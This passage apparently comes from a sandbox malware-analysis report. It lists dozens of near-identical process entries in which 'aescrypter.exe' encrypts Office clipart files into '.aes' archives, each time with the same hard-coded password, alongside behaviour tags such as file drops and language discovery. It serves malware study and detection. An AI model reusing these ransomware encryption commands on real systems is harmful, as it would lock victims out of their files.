  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2760
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382969.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2656
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2776
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384862.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1676
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2684
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1960
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384895.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384895.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2596
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:292
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386120.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386120.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2920
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1880
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2924
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386485.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386485.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2788
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386764.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1612
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387337.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1456
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387578.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387578.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2648
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387591.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387591.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1860
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387604.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:768
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387882.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387882.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3020
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0387895.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2388
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0390072.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1624
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400001.PNG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1660
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400002.PNG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2236
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400003.PNG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:772
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2244
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:760
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH00780U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH00780U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2208
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01035U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01035U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1532
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01046J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01046J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1668
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01179J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01179J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2496
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2912
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01221K.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01221K.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2456
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01235U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01235U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2380
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01236U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01236U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:828
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01239K.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01239K.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2220
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01247U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01247U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2196
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01265U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01265U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1708
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01332U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01332U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1804
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01478U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01478U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:892
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01562U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01562U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1460
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01607U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01607U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1580
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:580
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02028K.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02028K.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2864
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02039U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02039U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:936
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02040U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02040U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1696
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02053J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:916
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02058U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02058U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2616
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2764
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02069J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3056
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02071U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02071U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2972
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2096
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02208U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02208U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2672
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02223U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02223U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2900
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02291U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02291U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1088
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02398U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02398U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1520
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:380
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02417U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02417U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1036
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02466U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02466U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2980
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02470U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02470U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2948
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02503U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02503U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2036
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2928
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02736U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02736U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:840
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02738U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02738U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2840
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02740U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02740U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2984
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02742U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02742U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2996
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02746U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02746U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2192
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02748U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02748U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2084
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02749U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02749U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3040
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02750U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02750U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2112
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02752U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02752U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:300
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02753U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02753U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2088
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02754U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02754U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:860
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02755U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02755U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:708
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02756U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02756U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1576
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02757U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02757U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1608
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02758U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02758U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1992
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1912
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1528
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2120
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02897J.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02897J.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2500
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03011U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03011U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2392
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03012U.BMP.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03012U.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:344
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG.aes" "C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1752
- C:\ProgramData\local\aescrypter.exe
